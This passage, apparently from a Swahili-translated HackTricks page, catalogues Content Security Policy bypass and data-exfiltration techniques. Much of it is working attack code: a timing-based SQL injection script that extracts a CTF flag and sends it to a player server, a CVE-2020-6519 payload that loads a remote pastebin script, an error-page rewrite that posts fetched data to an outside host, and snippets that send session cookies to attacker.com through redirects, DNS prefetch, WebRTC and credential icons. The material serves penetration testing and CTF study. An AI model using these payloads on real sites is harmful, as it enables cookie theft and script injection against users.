return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`
}

async function query(word, end = false) {
let h = performance.now()
f.location = end ? gen2(word) : gen(word)
await new Promise((r) => {
g.onload = r
})
let diff = performance.now() - h
return diff > 300
}

let alphabet = "_abcdefghijklmnopqrstuvwxyz0123456789".split("")
let postfix = "}"

async function run() {
let prefix = "nn9ed{"
while (true) {
let i = 0
for (i; i < alphabet.length; i++) {
let c = alphabet[i]
let t = await query(prefix + c) // Check what chars returns TRUE or FALSE
console.log(prefix, c, t)
if (t) {
console.log("FOUND!")
prefix += c
break
}
}
if (i == alphabet.length) {
console.log("missing chars")
break
}
let t = await query(prefix + "}", true)
if (t) {
prefix += "}"
break
}
}
new Image().src = "http://PLAYER_SERVER/?" + prefix //Exfiltrate the flag
console.log(prefix)
}

run()
</script>
```
### Via Bookmarklets

Shambulio hili litahitaji uhandisi wa kijamii ambapo mshambuliaji **anawashawishi watumiaji kuburuta na kuacha kiungo juu ya bookmarklet ya kivinjari**. Huu bookmarklet utakuwa na **msimbo wa javascript mbaya** ambao unapoburuzwa na kuachwa au kubonyezwa utaanzishwa katika muktadha wa dirisha la wavuti la sasa, **ukipita CSP na kuruhusu kuiba taarifa nyeti** kama vile vidakuzi au tokeni.

Kwa maelezo zaidi [**angalia ripoti ya asili hapa**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).

### CSP bypass by restricting CSP

Katika [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inapita kwa kuingiza ndani ya iframe inayoruhusiwa CSP yenye vizuizi zaidi ambayo ilikataza kupakia faili maalum ya JS ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliruhusu **kudhulumu script tofauti ili kupakia script isiyo na mpangilio**.

Unaweza **kuzuia CSP ya Iframe** kwa kutumia **`csp`** sifa:
```html
<iframe
src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
```
Katika [**hii CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** **kuzuia** zaidi **CSP** hivyo script inayozuia CSTI ilizuiliwa na kwa hivyo **udhaifu ukawa unatumika.**\
CSP inaweza kufanywa kuwa na vizuizi zaidi kwa kutumia **HTML meta tags** na scripts za ndani zinaweza kuzuiliwa **kuondoa** **ingizo** linaloruhusu **nonce** zao na **kuwezesha script maalum za ndani kupitia sha**:
```html
<meta
http-equiv="Content-Security-Policy"
content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';" />
```
### JS exfiltration with Content-Security-Policy-Report-Only

Ikiwa unaweza kusababisha seva ijibu na kichwa **`Content-Security-Policy-Report-Only`** chenye **thamani inayodhibitiwa na wewe** (labda kwa sababu ya CRLF), unaweza kufanya ielekeze kwenye seva yako na ikiwa un **fungia** **maudhui ya JS** unayotaka kuhamasisha na **`<script>`** na kwa sababu kuna uwezekano mkubwa `unsafe-inline` hairuhusiwi na CSP, hii itasababisha **kosa la CSP** na sehemu ya script (iliyokuwa na taarifa nyeti) itatumwa kwa seva kutoka `Content-Security-Policy-Report-Only`.

Kwa mfano [**angalia hii CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).

### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector("DIV").innerHTML =
'<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>'
```
### Kueneza Taarifa kwa CSP na Iframe

- `iframe` inaundwa inayolenga URL (tuitaje `https://example.redirect.com`) ambayo inaruhusiwa na CSP.
- URL hii kisha inarejelea URL ya siri (kwa mfano, `https://usersecret.example2.com`) ambayo **hairuhusiwi** na CSP.
- Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kukamata mali ya `blockedURI`. Mali hii inaonyesha jina la kikoa cha URI iliyozuiwa, ikivuja jina la siri la kikoa ambacho URL ya awali ilielekeza.

Ni ya kuvutia kutambua kwamba vivinjari kama Chrome na Firefox vina tabia tofauti katika kushughulikia iframes kuhusiana na CSP, ikisababisha uvujaji wa taarifa nyeti kutokana na tabia isiyoeleweka.

Mbinu nyingine inahusisha kutumia CSP yenyewe ili kubaini subdomain ya siri. Njia hii inategemea algorithm ya kutafuta binary na kurekebisha CSP ili kujumuisha maeneo maalum ambayo yamezuiwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri ina wahusika wasiojulikana, unaweza kujaribu subdomains tofauti kwa kubadilisha mwelekeo wa CSP ili kuzuiya au kuruhusu subdomains hizi. Hapa kuna kipande kinachoonyesha jinsi CSP inaweza kuwekwa ili kuwezesha mbinu hii:
```markdown
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
Kwa kufuatilia ni maombi gani yanayozuiwa au kuruhusiwa na CSP, mtu anaweza kupunguza wahusika wanaowezekana katika subdomain ya siri, hatimaye kugundua URL kamili.

Mbinu zote mbili zinatumia nuances za utekelezaji wa CSP na tabia katika vivinjari, zikionyesha jinsi sera zinazodhaniwa kuwa salama zinaweza kwa bahati mbaya kuvuja taarifa nyeti.

Trick kutoka [**hapa**](https://ctftime.org/writeup/29310).

## Teknolojia Zisizo Salama za Kupita CSP

### Makosa ya PHP wakati wa param nyingi

Kulingana na [**mbinu ya mwisho iliyozungumziwa katika video hii**](https://www.youtube.com/watch?v=Sm4G6cAHjWM), kutuma param nyingi (1001 GET parameters ingawa unaweza pia kufanya hivyo na POST params na zaidi ya faili 20). **`header()`** yoyote iliyofafanuliwa katika msimbo wa wavuti wa PHP **haitatumwa** kwa sababu ya kosa ambalo hili litazalisha.

### Kupita kwa buffer ya majibu ya PHP

PHP inajulikana kwa **kufanya buffering ya majibu hadi 4096** bytes kwa default. Hivyo, ikiwa PHP inaonyesha onyo, kwa kutoa **data ya kutosha ndani ya maonyo**, **majibu** yatatumwa **kabla** ya **CSP header**, na kusababisha header ipuuzwe.\
Basi, mbinu inajumuisha kimsingi **kujaza buffer ya majibu na maonyo** ili header ya CSP isitumwe.

Wazo kutoka [**hiki andiko**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).

### Kuandika Upya Ukurasa wa Kosa

Kutoka [**hiki andiko**](https://blog.ssrf.kr/69) inaonekana kama ilikuwa inawezekana kupita ulinzi wa CSP kwa kupakia ukurasa wa kosa (labda bila CSP) na kuandika upya maudhui yake.
```javascript
a = window.open("/" + "x".repeat(4100))
setTimeout(function () {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`
}, 1000)
```
### SOME + 'self' + wordpress

SOME ni mbinu inayotumia XSS (au XSS iliyo na mipaka sana) **katika kiungo cha ukurasa** ili **kutumia** **viungo vingine vya asili moja.** Hii inafanywa kwa kupakia kiungo kilichoharibika kutoka kwenye ukurasa wa mshambuliaji na kisha ku-refresh ukurasa wa mshambuliaji hadi kiungo halisi katika asili moja unayotaka kutumia. Kwa njia hii, **kiungo kilichoharibika** kinaweza kutumia **`opener`** kitu katika **payload** ili **kufikia DOM** ya **kiungo halisi cha kutumia**. Kwa maelezo zaidi angalia:

{{#ref}}
../xss-cross-site-scripting/some-same-origin-method-execution.md
{{#endref}}

Zaidi ya hayo, **wordpress** ina **JSONP** kiungo katika `/wp-json/wp/v2/users/1?_jsonp=data` ambacho kita **reflekta** **data** iliyotumwa katika matokeo (ikiwa na mipaka ya herufi, nambari na nukta pekee).

Mshambuliaji anaweza kutumia kiungo hicho ili **kuunda shambulio la SOME** dhidi ya WordPress na **kuingiza** ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kwamba **script** hii itakuwa **imepakiwa** kwa sababu inaruhusiwa na 'self'. Zaidi ya hayo, na kwa sababu WordPress imewekwa, mshambuliaji anaweza kutumia **shambulio la SOME** kupitia **kiungo cha callback kilichoharibika** ambacho **kinapita CSP** ili kutoa ruhusa zaidi kwa mtumiaji, kusakinisha plugin mpya...\
Kwa maelezo zaidi kuhusu jinsi ya kutekeleza shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)

## CSP Exfiltration Bypasses

Ikiwa kuna CSP kali ambayo haitakuruhusu **kuingiliana na seva za nje**, kuna mambo kadhaa unaweza kufanya kila wakati ili kutoa taarifa.

### Location

Unaweza tu kuboresha eneo ili kutuma kwa seva ya mshambuliaji taarifa ya siri:
```javascript
var sessionid = document.cookie.split("=")[1] + "."
document.location = "https://attacker.com/?" + sessionid
```
### Meta tag

Unaweza kuelekeza kwa kuingiza meta tag (hii ni kuelekeza tu, hii haitavuja maudhui)
```html
<meta http-equiv="refresh" content="1; http://attacker.com" />
```
### DNS Prefetch

Ili kupakia kurasa kwa haraka, vivinjari vinakwenda kuanzisha majina ya mwenyeji kuwa anwani za IP na kuziweka kwenye cache kwa matumizi ya baadaye.\
Unaweza kuonyesha kivinjari kuanzisha jina la mwenyeji kwa: `<link rel="dns-prefetch" href="something.com">`

Unaweza kutumia tabia hii vibaya ili **kuondoa taarifa nyeti kupitia maombi ya DNS**:
```javascript
var sessionid = document.cookie.split("=")[1] + "."
var body = document.getElementsByTagName("body")[0]
body.innerHTML =
body.innerHTML +
'<link rel="dns-prefetch" href="//' +
sessionid +
'attacker.ch">'
```
Njia nyingine:
```javascript
const linkEl = document.createElement("link")
linkEl.rel = "prefetch"
linkEl.href = urlWithYourPreciousData
document.head.appendChild(linkEl)
```
Ili kuepuka hili kutokea, seva inaweza kutuma kichwa cha HTTP:
```
X-DNS-Prefetch-Control: off
```
> [!NOTE]
> Kwa kweli, mbinu hii haifanyi kazi katika vivinjari visivyo na kichwa (bots)

### WebRTC

Katika kurasa kadhaa unaweza kusoma kwamba **WebRTC haichunguze sera ya `connect-src`** ya CSP.

Kwa kweli unaweza _kuvuja_ taarifa kwa kutumia _ombio la DNS_. Angalia hii code:
```javascript
;(async () => {
p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
p.createDataChannel("")
p.setLocalDescription(await p.createOffer())
})()
```
Chaguo lingine:
```javascript
var pc = new RTCPeerConnection({
"iceServers":[
{"urls":[
"turn:74.125.140.127:19305?transport=udp"
],"username":"_all_your_data_belongs_to_us",
"credential":"."
}]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
### CredentialsContainer

Popup ya akreditivu inatuma ombi la DNS kwa iconURL bila kuzuiliwa na ukurasa. Inafanya kazi tu katika muktadha salama (HTTPS) au kwenye localhost.
```javascript
navigator.credentials.store(
new FederatedCredential({
id:"satoki",
name:"satoki",
provider:"https:"+your_data+"example.com",
iconURL:"https:"+your_data+"example.com"
})
)
```
## Kuangalia Sera za CSP Mtandaoni

- [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com/)
- [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)

## Kuunda CSP Kiotomatiki

[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)

## Marejeleo

- [https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/](https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/)
- [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
- [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
- [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
- [https://www.youtube.com/watch?v=MCyPuOWs3dg](https://www.youtube.com/watch?v=MCyPuOWs3dg)
- [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/)
- [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)

​

{{#include ../../banners/hacktricks-training.md}}